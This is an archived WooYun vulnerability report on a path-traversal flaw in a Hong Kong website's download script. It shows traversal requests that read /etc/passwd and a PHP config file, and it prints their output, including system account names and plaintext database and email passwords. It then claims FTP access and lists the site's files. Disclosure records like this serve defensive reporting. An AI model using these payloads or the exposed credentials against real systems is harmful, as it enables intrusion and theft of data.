乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-05: 细节已通知厂商并且等待厂商处理中 2015-12-09: 厂商已经确认,细节仅向厂商公开 2015-12-19: 细节向核心白帽子及相关领域专家公开 2015-12-29: 细节向普通白帽子公开 2016-01-08: 细节向实习白帽子公开 2016-01-23: 细节向公众公开
Hello,hkcert香港互联网应急协调中心~
下载点:
http://**.**.**.**/downproject.php?u=../../../../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/bin/bashdaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinnews:x:9:13:news:/etc/news:uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologinrpm:x:37:37::/var/lib/rpm:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinnscd:x:28:28:NSCD Daemon:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinpcap:x:77:77::/var/arpwatch:/sbin/nologinavahi:x:70:70:Avahi daemon:/:/sbin/nologinrpc:x:32:32:Portmapper RPC user:/:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinxfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologinwww:x:80:80::/home/www:/bin/bashntp:x:38:38::/etc/ntp:/sbin/nologinvizz:x:507:509::/home/vizz:/bin/bashoprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologinavahi-autoipd:x:100:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologinmyiconlight:x:103:80:**.**.**.**:/export/web/myiconlight:/sbin/nologinmysql:x:508:508::/usr/local/mysql:/sbin/nologingino:x:502:500::/export/web/gino:/bin/bashswsd2010:x:2653:80::/export/web/swsd2010:/bin/shalias:x:2654:510::/var/qmail/alias:/sbin/nologinqmaild:x:2655:510::/var/qmail:/sbin/nologinqmaill:x:2656:510::/var/qmail:/sbin/nologinqmailp:x:2657:510::/var/qmail:/sbin/nologinqmailq:x:2658:511::/var/qmail:/sbin/nologinqmailr:x:2659:511::/var/qmail:/sbin/nologinqmails:x:2660:511::/var/qmail:/sbin/nologinaster:x:2534:80:**.**.**.**:/export/web/aster:/bin/shwincalpharm:x:2860:80:**.**.**.**:/export/web/wincalpharm:/sbin/nologindejohk:x:2862:80:**.**.**.**:/export/web/dejohk:/sbin/nologinworldlinkhk:x:2864:80:**.**.**.**:/export/web/worldlinkhk:/sbin/nologinoutdoorproducts:x:2867:80:**.**.**.**:/export/web/outdoorproducts:/sbin/nologinjoannshe:x:2869:80:**.**.**.**:/export/web/joannshe:/bin/shsynergytechhk:x:2872:80:**.**.**.**:/export/web/synergytechhk:/sbin/nologinkeibert:x:2873:80:**.**.**.**:/export/web/keibert:/sbin/nologinhealthguardcn:x:2875:80:**.**.**.**:/export/web/healthguardcn:/sbin/nologincolroot:x:2876:80:**.**.**.**:/export/web/colroot:/sbin/nologincm2square:x:2878:80:**.**.**.**:/export/web/cm2square:/sbin/nologindamoorghk:x:2882:80:**.**.**.**:/export/web/damoorghk:/sbin/nologintaicohk:x:2884:80:**.**.**.**:/export/web/taicohk:/sbin/nologinsideways:x:2888:80:**.**.**.**:/export/web/sideways:/sbin/nologintimwaytest:x:2889:80:**.**.**.**:/export/web/timwaytest:/sbin/nologinfreeformoptical:x:2893:80:**.**.**.**:/export/web/freeformoptical:/sbin/nologinjollykingdom:x:2894:80:**.**.**.**:/export/web/jollykingdom:/sbin/nologinangelgrace:x:2902:80:**.**.**.**:/export/web/angelgrace:/sbin/nologinsearcheasy:x:2903:80:**.**.**.**:/export/web/searcheasy:/sbin/nologinheijkoopinvest:x:2906:80:**.**.**.**:/export/web/heijkoopinvest:/sbin/nologincedhk:x:2912:80:**.**.**.**:/export/web/cedhk:/sbin/nologinchinapromotion:x:2917:80:**.**.**.**:/export/web/chinapromotion:/bin/shchikahk:x:2918:80:**.**.**.**:/export/web/chikahk:/sbin/nologingianna:x:2927:80:**.**.**.**:/export/web/gianna:/sbin/nologinbiegoinc:x:2929:80:**.**.**.**:/export/web/biegoinc:/sbin/nologinnexsos:x:2932:80:**.**.**.**:/export/web/nexsos:/sbin/nologinpontitdg:x:2934:80:**.**.**.**:/export/web/pontitdg:/sbin/nologingowingroup:x:2935:80:**.**.**.**:/export/web/gowingroup:/bin/shiskydesign:x:2941:80:**.**.**.**:/export/web/iskydesign:/sbin/nologintalentfocushk:x:2942:80:**.**.**.**:/export/web/talentfocushk:/sbin/nologintaihingproducts:x:2944:80:**.**.**.**:/export/web/taihingproducts:/sbin/nologinnasonpearl:x:2946:80:**.**.**.**:/export/web/nasonpearl:/sbin/nologinmiyabihk:x:2947:80:**.**.**.**:/export/web/miyabihk:/bin/shvizzpromotion:x:2948:80:**.**.**.**:/export/web/vizzpromotion:/sbin/nologinmppromo:x:2954:80:**.**.**.**:/export/web/mppromo:/sbin/nologinnashkhk:x:2955:80:**.**.**.**:/export/web/nashkhk:/sbin/nologinphonebuytest:x:2956:80:**.**.**.**:/export/web/phonebuytest:/sbin/nologintonwell:x:2958:80:**.**.**.**:/export/web/tonwell:/sbin/nologinrhemaengineer:x:2959:80:**.**.**.**:/export/web/rhemaengineer:/sbin/nologinshundatest01:x:2964:80:**.**.**.**:/export/web/shundatest01:/sbin/nologinpretterior:x:2965:80:**.**.**.**:/export/web/pretterior:/bin/shpressroom01:x:2966:80:**.**.**.**:/export/web/pressroom01:/sbin/nologintastefulbeers:x:2967:80:tastefulbeers.biz:/export/web/tastefulbeers:/sbin/nologinnorthwing:x:2969:80:**.**.**.**:/export/web/northwing:/sbin/nologinuarm:x:2970:80:**.**.**.**:/export/web/uarm:/sbin/nologinchunkeehk:x:2971:80:**.**.**.**:/export/web/chunkeehk:/sbin/nologinmesadahk:x:2974:80:**.**.**.**:/export/web/mesadahk:/sbin/nologinjobsasap:x:2975:80:**.**.**.**:/export/web/jobsasap:/sbin/nologinphplisttest:x:2976:80:**.**.**.**:/export/web/phplisttest:/bin/shheltexfashion:x:2980:80:**.**.**.**:/export/web/heltexfashion:/bin/shambrosiacuisine:x:2982:80:**.**.**.**:/export/web/ambrosiacuisine:/bin/shpontiwinecell:x:2984:80:**.**.**.**:/export/web/pontiwinecell:/sbin/nologinpontiwinesg:x:2985:80:**.**.**.**.sg:/export/web/pontiwinesg:/sbin/nologinhktjq:x:2989:80:**.**.**.**:/export/web/hktjq:/bin/sh...
http://**.**.**.**/downproject.php?u=../../configs/config.inc.php
<?php define("__SITE_ROOT", dirname(__FILE__) . '/..' ); define('__DATABASE_TYPE', 'mysql'); define('__MYSQL_HOST', 'localhost'); // Database Host define('__MYSQL_USER', 'cahkorghk'); // Database User define('__MYSQL_PASSWD', 'QqYDxbkN'); // Database Password define('__MYSQL_DATABASE', 'cahkorghk'); // Database Name // Database Table Prefix define('__MYSQL_PREFIX_F', 'ca'); // Greenpower Database Table Prefix define('__MYSQL_ENCODING', 'UTF8'); // Database Encoding define('__TEMPLATE_DIR', __SITE_ROOT . '/templates'); define('__TEMPLATE_COMPILE_DIR', __SITE_ROOT . '/templates_c'); define('__TEMPLATE_CONFIG_DIR', __SITE_ROOT . '/configs'); define('__TEMPLATE_CACHE_DIR', __SITE_ROOT . '/cache'); define('__TEMPLATE_LEFT_DELIMITER', '<{'); define('__TEMPLATE_RIGHT_DELIMITER', '}>'); define('__DEBUG', '1'); define('__SESSION_TIMEOUT', '60'); /* Modified at 20070726 for New Web Hosting */ define('__SESSION_PATH', __SITE_ROOT . '/sessions'); /* End Modified at 20070726 for New Web Hosting */ define('__PAGE_SHOW', '15'); define('__PAGE_SET', '10'); define('__SITE_COMPANY', 'Greenpower Minisite'); define('__SITE_SYSTEM', 'Website Management System'); define('__SITE_TITLE', __SITE_COMPANY . ' - ' . __SITE_SYSTEM); define('__SITE_LOGO', 'images/logo.jpg'); define('__VERSION', ''); define('__COPYRIGHT', 'Copyright © '.date('Y').' all rights reserved.'); define('__POWEREDBY', ''); //define('__EMAIL_SUBJECT', 'Greenpower Minisite'); //�]�����} //define('__EMAIL_SUBJECT_EN', 'Thank you for supporting !!');//Ӣ�İ��]�����} define('__EMAIL_NAME', '長春社');//�l���˳ƺ� // define('__EMAIL_FROM', 'sunsky@**.**.**.**');//�l���� //define('__EMAIL_FROM_PASSWORD', 'Sk6263#Sup'); // define('__EMAIL_SMTPSERVER', '**.**.**.**');//�l���� define('__SMTP_AUTH', false);// define('__SITE_URL', 'http://**.**.**.**/7.14butterflytest'); //define('__SITE_URL', 'http://**.**.**.**/greenpower/7.14butterfly'); //define('__EMAIL_SENDER', 'project@**.**.**.**'); // define('__CHECK_AUTHORIZED_IP', 0);?>
相同密码可登录ftp上传文件:
FTP root at **.**.**.**To view this FTP site in Windows Explorer, click Page, and then click Open FTP Site in Windows Explorer.--------------------------------------------------------------------------------09/29/2015 08:38AM 876 Contactus.php09/29/2015 08:38AM 1,082 Environmental.php09/29/2015 08:38AM 886 Personal_Information.php09/29/2015 08:38AM 879 Privacy_notice.php10/09/2015 03:18AM 1,824 about.php09/29/2015 08:38AM 888 activity_news_details.php09/29/2015 08:38AM 1,067 activity_news_list.php12/02/2015 04:12AM Directory admin2s08/28/2015 11:03AM Directory class08/28/2015 11:04AM Directory classes12/01/2015 07:38AM 576 co.php08/28/2015 11:04AM Directory configs12/02/2015 09:46AM 99,561 connector.php12/01/2015 07:30AM 28 connn.php08/28/2015 11:04AM Directory css09/29/2015 08:38AM 851 database.php09/29/2015 08:38AM 819 donation.php08/28/2015 11:04AM Directory download09/29/2015 08:38AM 314 download_subscription.php09/29/2015 08:38AM 950 downproject.php08/28/2015 11:04AM Directory fancybox09/25/2015 06:53AM Directory images08/28/2015 10:05AM Directory includes09/29/2015 08:38AM 1,196 index.php09/29/2015 08:38AM 573 join.php12/02/2015 04:56AM Directory js...
以及网站后台管理页面:
如上
过滤
危害等级:高
漏洞Rank:13
确认时间:2015-12-09 16:07
Referred to related parties.
暂无